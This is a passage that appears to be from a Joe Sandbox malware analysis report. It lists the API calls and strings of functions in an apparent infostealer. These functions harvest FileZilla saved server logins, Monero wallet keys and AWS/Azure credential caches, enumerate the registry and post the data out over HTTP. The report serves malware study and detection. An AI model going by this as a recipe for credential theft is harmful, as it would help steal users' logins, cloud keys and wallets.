                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008204F3
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0082052F
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 0082053D
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00820579
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820587
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008205C3
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008205D5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820662
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 0082067A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820692
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008206AA
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008206C2
                              • lstrcat.KERNEL32(?,profile: null), ref: 008206D1
                              • lstrcat.KERNEL32(?,url: ), ref: 008206E0
                              • lstrcat.KERNEL32(?,00000000), ref: 008206F3
                              • lstrcat.KERNEL32(?,00831770), ref: 00820702
                              • lstrcat.KERNEL32(?,00000000), ref: 00820715
                              • lstrcat.KERNEL32(?,00831774), ref: 00820724
                              • lstrcat.KERNEL32(?,login: ), ref: 00820733
                              • lstrcat.KERNEL32(?,00000000), ref: 00820746
                              • lstrcat.KERNEL32(?,00831780), ref: 00820755
                              • lstrcat.KERNEL32(?,password: ), ref: 00820764
                              • lstrcat.KERNEL32(?,00000000), ref: 00820777
                              • lstrcat.KERNEL32(?,00831790), ref: 00820786
                              • lstrcat.KERNEL32(?,00831794), ref: 00820795
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008207EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 964c49de0661a9251cce1d5ad406a56ce6484813b02b2ccdb0431777ebacc712
                              • Instruction ID: bf1ad2c3c0302c01b03eea2a92fb587d5a5476fc43683dbc5d7615eefa46d4cd
                              • Opcode Fuzzy Hash: 964c49de0661a9251cce1d5ad406a56ce6484813b02b2ccdb0431777ebacc712
                              • Instruction Fuzzy Hash: EED14F71900218ABCB08EBE8ED96EEE7339FF54700F408558F512F6195DF34AA85CB62
                              Function 008159B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00815A48
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00815A63
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815BE3
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015FE4D0,00000000,?,015F9F78,00000000,?,00831B4C), ref: 00815EC1
                              • lstrlen.KERNEL32(00000000), ref: 00815ED2
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00815EE3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00815EEA
                              • lstrlen.KERNEL32(00000000), ref: 00815EFF
                              • lstrlen.KERNEL32(00000000), ref: 00815F28
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00815F41
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00815F6B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00815F7F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00815F9C
                              • InternetCloseHandle.WININET(00000000), ref: 00816000
                              • InternetCloseHandle.WININET(00000000), ref: 0081600D
                              • HttpOpenRequestA.WININET(00000000,015FE410,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 00815C48
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • InternetCloseHandle.WININET(00000000), ref: 00816017
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 857e234d909ea094b2f51881e059bd1289d1ae987c2083362fa034a919582213
                              • Instruction ID: 903bf96ff6a049547433e21ddedcd04e807c11d39354056612a94a74e78761db
                              • Opcode Fuzzy Hash: 857e234d909ea094b2f51881e059bd1289d1ae987c2083362fa034a919582213
                              • Instruction Fuzzy Hash: 7F122371920128ABCB18EBA4ECA5FEEB379FF54710F404599F506B6191DF302A89CF52
                              Function 0081CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D083
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081D1C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0081D1CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D308
                              • lstrcat.KERNEL32(?,00831570), ref: 0081D317
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D32A
                              • lstrcat.KERNEL32(?,00831574), ref: 0081D339
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D34C
                              • lstrcat.KERNEL32(?,00831578), ref: 0081D35B
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D36E
                              • lstrcat.KERNEL32(?,0083157C), ref: 0081D37D
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D390
                              • lstrcat.KERNEL32(?,00831580), ref: 0081D39F
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D3B2
                              • lstrcat.KERNEL32(?,00831584), ref: 0081D3C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D3D4
                              • lstrcat.KERNEL32(?,00831588), ref: 0081D3E3
                                • Part of subcall function 0082AB30: lstrlen.KERNEL32(00814F55,?,?,00814F55,00830DDF), ref: 0082AB3B
                                • Part of subcall function 0082AB30: lstrcpy.KERNEL32(00830DDF,00000000), ref: 0082AB95
                              • lstrlen.KERNEL32(?), ref: 0081D42A
                              • lstrlen.KERNEL32(?), ref: 0081D439
                                • Part of subcall function 0082AD80: StrCmpCA.SHLWAPI(00000000,00831568,0081D2A2,00831568,00000000), ref: 0082AD9F
                              • DeleteFileA.KERNEL32(00000000), ref: 0081D4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: e3fbdb813c2cb3b5c3d94225df57b908a6898cc5ed2e79048a139578bfaac3f8
                              • Instruction ID: 7607b3575f954e18ca12e940e9fc650d6cc8ee515a5f3bb1eaf463c79c560764
                              • Opcode Fuzzy Hash: e3fbdb813c2cb3b5c3d94225df57b908a6898cc5ed2e79048a139578bfaac3f8
                              • Instruction Fuzzy Hash: B5E14E71910118ABCB08EBE8ED96EEE7339FF54301F404558F507F61A1DE35AA89CB62
                              Function 0081CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015FCE38,00000000,?,00831544,00000000,?,?), ref: 0081CB6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0081CB89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0081CB95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0081CBA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0081CBD9
                              • StrStrA.SHLWAPI(?,015FCF70,00830B56), ref: 0081CBF7
                              • StrStrA.SHLWAPI(00000000,015FCE80), ref: 0081CC1E
                              • StrStrA.SHLWAPI(?,015FD098,00000000,?,00831550,00000000,?,00000000,00000000,?,015F8A40,00000000,?,0083154C,00000000,?), ref: 0081CDA2
                              • StrStrA.SHLWAPI(00000000,015FD3D8), ref: 0081CDB9
                                • Part of subcall function 0081C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081C971
                                • Part of subcall function 0081C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081C97C
                              • StrStrA.SHLWAPI(?,015FD3D8,00000000,?,00831554,00000000,?,00000000,015F8A50), ref: 0081CE5A
                              • StrStrA.SHLWAPI(00000000,015F89E0), ref: 0081CE71
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B47), ref: 0081CA43
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B4B), ref: 0081CA57
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B4E), ref: 0081CA78
                              • lstrlen.KERNEL32(00000000), ref: 0081CF44
                              • CloseHandle.KERNEL32(00000000), ref: 0081CF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: daf0155fa7adc08e2562feeceb39f77ec7b676fec42e401476e2e3604623ab7b
                              • Instruction ID: cff9cf653ca771f0fc6af06f0b908798ac1342e7d1a219af9b8b746c7d1e0585
                              • Opcode Fuzzy Hash: daf0155fa7adc08e2562feeceb39f77ec7b676fec42e401476e2e3604623ab7b
                              • Instruction Fuzzy Hash: 9BE1CD71910118ABCB18EBA8ECA6FEEB779FF54310F004559F506B7191DF306A89CB62
                              Function 008284B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • RegOpenKeyExA.ADVAPI32(00000000,015FACC0,00000000,00020019,00000000,008305BE), ref: 00828534
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008285B6
                              • wsprintfA.USER32 ref: 008285E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0082860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0082861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828629
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d12bfa3650637f5f2f76dc19341f0c5e1c4d4221d9f4932b60bcecf86c843f50
                              • Instruction ID: 767e2b559dad9e6a9335c7eecd127afc7b7280c4b8f82eae17b194fe609d0c7a
                              • Opcode Fuzzy Hash: d12bfa3650637f5f2f76dc19341f0c5e1c4d4221d9f4932b60bcecf86c843f50
                              • Instruction Fuzzy Hash: C9811A71911128ABDB28DB94DD95FEAB7B8FF48310F1086D8E109A6180DF746BC5CFA1
                              Function 00824FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 00825000
                              • lstrcat.KERNEL32(?,\.azure\), ref: 0082501D
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824B7C
                                • Part of subcall function 00824B60: FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                              • lstrcat.KERNEL32(?,00000000), ref: 0082508C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 008250A9
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                                • Part of subcall function 00824B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                                • Part of subcall function 00824B60: FindClose.KERNEL32(000000FF), ref: 00824DE2
                              • lstrcat.KERNEL32(?,00000000), ref: 00825118
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00825135
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824C00
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,008308D3), ref: 00824C15
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824C32
                                • Part of subcall function 00824B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00824C6E
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,015FE4C0), ref: 00824C9A
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,00830FE0), ref: 00824CAC
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,?), ref: 00824CC0
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,00830FE4), ref: 00824CD2
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,?), ref: 00824CE6
                                • Part of subcall function 00824B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00824CFC
                                • Part of subcall function 00824B60: DeleteFileA.KERNEL32(?), ref: 00824D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 6008447a39404a8516d0044cbd0db74d05eb3f85f579c159002fc300513a48ce
                              • Instruction ID: 999ef2264c42a2e87c0183531b84f53a1a4ecf8f453208e9f066ca551e849e5d
                              • Opcode Fuzzy Hash: 6008447a39404a8516d0044cbd0db74d05eb3f85f579c159002fc300513a48ce
                              • Instruction Fuzzy Hash: 3841A3BA94021867DF14E770EC9BFED7328EB94700F404554B659E51C1EEB857C88B92
                              Function 008291A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008291FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
